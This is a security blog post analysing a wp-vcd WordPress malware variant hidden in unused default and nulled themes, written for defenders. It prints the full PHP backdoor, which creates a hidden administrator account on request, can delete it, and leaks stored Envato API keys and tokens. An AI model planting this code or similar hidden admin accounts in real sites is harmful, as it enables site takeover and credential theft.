Recently we saw a new wave of a known malware that injects malicious WordPress admin users to vulnerable or compromised sites.The malware, well analysed by Manuel D’Orso (here), was being injected on default WordPress themes that are not used by the infected site (twentyfifteen and twentysixteen mostly).
Back when we first detected this wp-vcd variant, it was injecting its code on “wp-includes/class.wp.php”, this is an outdated strategy to avoid being detected by the unaware user; since nobody wants to delete WordPress core files and risk the site integrity. However, as security tools become more and more popular, this strategy fails. It’s now pretty easy for any tool to detect modifications on core files. And, since theme files are changed constantly, they found a better place to hide it.
The injection, on most of the cases we found, was related to outdated software (plugins or themes). Which a simple update or using a WAF would prevent. Update: This malware is also pre-installed in “nulled” premium themes on certain download sites.
Code is pretty straightforward and doesn’t hide its malicious intentions by encoding or obfuscation of functions…
<?phperror_reporting(0);if( !isset($_GET['go']) ){require $_SERVER['DOCUMENT_ROOT'].'/wp-load.php';$table_name = $wpdb->get_blog_prefix();$sample = 'a:1:{s:13:"administrator";b:1;}';if( isset($_GET['ok']) ) { echo '<!-- Silence is golden. -->';}if( isset($_GET['awu']) ) {$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100010010', '100010010', '$P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.', '100010010', 'te@ea.st', '', '2011/06/07 0:00 00:00:00', '', '0', '100010010');");$wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, '100010010', '{$table_name}capabilities', '{$sample}');");$wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '100010010', '{$table_name}user_level', '10');"); }if( isset($_GET['dwu']) ) { $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 100010010");$wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 100010010");}if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); cho '<center><h2>' . esc_attr( $options['user_name'] . ':' . esc_attr( $options['api_key'])) . '<br>'; echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; } }
It is creating a new admin user named 100010010 which, as admin, can perform several malicious activities on the infected site.
If you found this code on your site and need help checking for any other possible malware, please contact us we’ll be glad to help.
